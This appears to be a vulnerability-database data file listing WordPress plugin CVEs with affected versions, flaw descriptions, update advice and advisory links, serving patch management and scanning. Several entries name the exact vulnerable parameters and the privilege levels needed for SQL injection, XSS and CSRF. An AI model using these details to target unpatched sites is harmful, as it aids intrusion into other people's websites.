{"CVE_ID":"CVE-2023-6064","slug":"payhere-payment-gateway","versionImpact":"2.2.11","versionEndExcluding":"2.2.12","description":"The PayHere Payment Gateway WordPress plugin before 2.2.12 automatically creates publicly-accessible log files containing sensitive information when transactions occur.","recommendation":"Update to version 2.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/423c8881-628b-4380-9677-65b3f5165efe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/423c8881-628b-4380-9677-65b3f5165efe\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9438","slug":"seur","versionImpact":"2.2.11","versionEndExcluding":"2.2.12","description":"The SEUR Oficial plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'change_service' parameter in all versions up to, and including, 2.2.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88edf229-2be2-49d0-b500-e8ff7708f806?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88edf229-2be2-49d0-b500-e8ff7708f806?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176965\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176965\\\/seur\\\/trunk\\\/core\\\/pages\\\/seur-get-labels.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4372","slug":"carousel-slider","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The Carousel Slider WordPress plugin before 2.2.11 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13dcfd8a-e378-44b4-af6f-940bc41539a4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13dcfd8a-e378-44b4-af6f-940bc41539a4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13483","slug":"ltl-freight-quotes-saia-edition","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The LTL Freight Quotes \u2013 SAIA Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 2.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242171%40ltl-freight-quotes-saia-edition&new=3242171%40ltl-freight-quotes-saia-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242171%40ltl-freight-quotes-saia-edition&new=3242171%40ltl-freight-quotes-saia-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5e0d192-17ee-42bd-9368-c8449d8e0d08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5e0d192-17ee-42bd-9368-c8449d8e0d08?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1177","slug":"wp-club-manager","versionImpact":"2.2.10","versionEndExcluding":"2.2.11","description":"The WP Club Manager \u2013 WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs","recommendation":"Update to version 2.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3703","slug":"carousel-slider","versionImpact":"2.2.9","versionEndExcluding":"2.2.10","description":"The Carousel Slider WordPress plugin before 2.2.10 does not validate and escape some of its Slide options before outputting them back in the page\/post where the related Slide shortcode is embed, which could allow users with the Editor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3242b820-1da0-41ba-9f35-7be5dbc6d4b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3242b820-1da0-41ba-9f35-7be5dbc6d4b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4265","slug":"postmatic","versionEndExcluding":"2.2.10","description":"The Replyable WordPress plugin before 2.2.10 does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095cba08-7edd-41fb-9776-da151c0885dd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095cba08-7edd-41fb-9776-da151c0885dd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3133","slug":"tutor","versionEndExcluding":"2.2.1","description":"The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.2.0\\\/classes\\\/RestAPI.php#L253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.2.0\\\/classes\\\/RestAPI.php#L253\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b6969a7-5cbc-4e16-8f27-5dde481237f5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b6969a7-5cbc-4e16-8f27-5dde481237f5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12635","slug":"wp-docs","versionImpact":"2.2.0","versionEndExcluding":"2.2.1","description":"The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-docs\\\/tags\\\/2.1.8\\\/inc\\\/functions.php#L1963\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-docs\\\/tags\\\/2.1.8\\\/inc\\\/functions.php#L1963\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210644\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210644\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210656\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210656\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7492","slug":"mainwp-child-reports","versionImpact":"2.2","versionEndExcluding":"2.2.1","description":"The MainWP Child Reports plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdd7971c-6f1c-437a-832c-e2b2817a197e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child-reports\\\/trunk\\\/classes\\\/class-network.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child-reports\\\/trunk\\\/classes\\\/class-network.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131718%40mainwp-child-reports&new=3131718%40mainwp-child-reports&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131718%40mainwp-child-reports&new=3131718%40mainwp-child-reports&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9829","slug":"download-plugin","versionImpact":"2.2.0","versionEndExcluding":"2.2.1","description":"The Download Plugin plugin for WordPress is vulnerable to unauthorized access of data due to missing capability checks on the 'dpwap_handle_download_user' and 'dpwap_handle_download_comment' functions in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download any comment, and download metadata for any user including user PII and sensitive information including username, email, hashed passwords and application passwords, session token information and more depending on set up and additional plugins installed.","recommendation":"Update to version 2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0891211-e4b3-4dcf-8ee0-e20abeb91640?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0891211-e4b3-4dcf-8ee0-e20abeb91640?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/trunk\\\/download-plugin.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170600\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170600\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2337","slug":"convertkit","versionEndExcluding":"2.2.1","description":"The ConvertKit WordPress plugin before 2.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5a6f834-80a4-406b-acae-57ffeec2e689\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5a6f834-80a4-406b-acae-57ffeec2e689\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6555","slug":"wp-popups-lite","versionImpact":"2.2.0.1","versionEndExcluding":"2.2.0.2","description":"The WP Popups \u2013 WordPress Popup builder plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.0.1. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/578892f2-9841-4493-8445-61b79feb4764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/578892f2-9841-4493-8445-61b79feb4764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11450","slug":"onlyoffice","versionImpact":"2.0.0","versionEndExcluding":"2.2.0","description":"The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200917%40onlyoffice&new=3200917%40onlyoffice\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200917%40onlyoffice&new=3200917%40onlyoffice\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b71264-5b0f-41cb-86c1-a052d1976597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80b71264-5b0f-41cb-86c1-a052d1976597?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4099","slug":"list-children","versionImpact":"2.1","versionEndExcluding":"2.2.0","description":"The List Children plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'list_children' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/list-children\\\/trunk\\\/list_children.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/list-children\\\/trunk\\\/list_children.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284430\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284430\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538b4d4b-f8c6-44db-89d2-d345bfbfecb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538b4d4b-f8c6-44db-89d2-d345bfbfecb2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10340","slug":"ultimate-shortcodes-creator","versionImpact":"2.1.3","versionEndExcluding":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'scu' shortcode in versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/frontend\\\/class-frontend.php?rev=2338595#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/frontend\\\/class-frontend.php?rev=2338595#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181163\\\/ultimate-shortcodes-creator#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181163\\\/ultimate-shortcodes-creator#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10551","slug":"simple-side-tab","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The Sticky Social Icons WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd1aea4a-e5a6-4f87-805d-459b293bbf28\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd1aea4a-e5a6-4f87-805d-459b293bbf28\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11183","slug":"simple-side-tab","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The Simple Side Tab WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff3f2788-d1a1-4a62-a247-39a931308f51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff3f2788-d1a1-4a62-a247-39a931308f51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6592","slug":"fastdup","versionImpact":"2.1.9","versionEndExcluding":"2.2.0","description":"The FastDup WordPress plugin before 2.2 does not prevent directory listing in sensitive directories containing export files.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a39bb807-b143-4863-88ff-1783e407d7d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a39bb807-b143-4863-88ff-1783e407d7d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7717","slug":"wp-events-manager","versionImpact":"2.1.11","versionEndExcluding":"2.2.0","description":"The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88dc08ff-3966-4606-855c-57c25552599e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88dc08ff-3966-4606-855c-57c25552599e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/trunk\\\/inc\\\/class-wpems-post-types.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/trunk\\\/inc\\\/class-wpems-post-types.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/tags\\\/2.2.0\\\/inc\\\/class-wpems-post-types.php?rev=3144021\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-events-manager\\\/tags\\\/2.2.0\\\/inc\\\/class-wpems-post-types.php?rev=3144021\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2493","slug":"all-in-one-redirection","versionEndExcluding":"2.2.0","description":"The All In One Redirection WordPress plugin before 2.2.0 does not properly sanitise and escape multiple parameters before using them in an SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a205a4-eef9-4f30-877a-4c562930650c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a205a4-eef9-4f30-877a-4c562930650c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4823","slug":"wp-meta-and-date-remover","versionEndExcluding":"2.2.0","description":"The WP Meta and Date Remover WordPress plugin before 2.2.0 provides an AJAX endpoint for configuring the plugin settings. This endpoint has no capability checks and does not sanitize the user input, which is then later output unescaped, allowing any authenticated user, such as a subscriber, to change the settings and perform Stored Cross-Site Scripting.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f53e27-d8d2-4fa3-91f9-447037508d30\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f53e27-d8d2-4fa3-91f9-447037508d30\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5741","slug":"powr-pack","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'powr-powr-pack' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2967eae-82bb-4556-a21a-c5bb6b905c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2967eae-82bb-4556-a21a-c5bb6b905c62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powr-pack\\\/trunk\\\/src\\\/pack.php?rev=2821707#L201\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52185","slug":"everest-backup","versionEndExcluding":"2.2.0","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Everestthemes Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin. This issue affects Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin: from n\/a through 2.1.9.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/everest-backup\\\/wordpress-everest-backup-plugin-2-1-9-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/everest-backup\\\/wordpress-everest-backup-plugin-2-1-9-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0836","slug":"review-schema","versionImpact":"2.1.14","versionEndExcluding":"2.2.0","description":"The WordPress Review & Structure Data Schema Plugin \u2013 Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028627\\\/review-schema\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/Review.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028627\\\/review-schema\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/Review.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3292","slug":"grid-kit-premium","versionEndExcluding":"2.2.0","description":"The grid-kit-premium WordPress plugin before 2.2.0 does not escape some parameters as well as generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d993c385-c3ad-49a6-b079-3a1b090864c8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d993c385-c3ad-49a6-b079-3a1b090864c8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
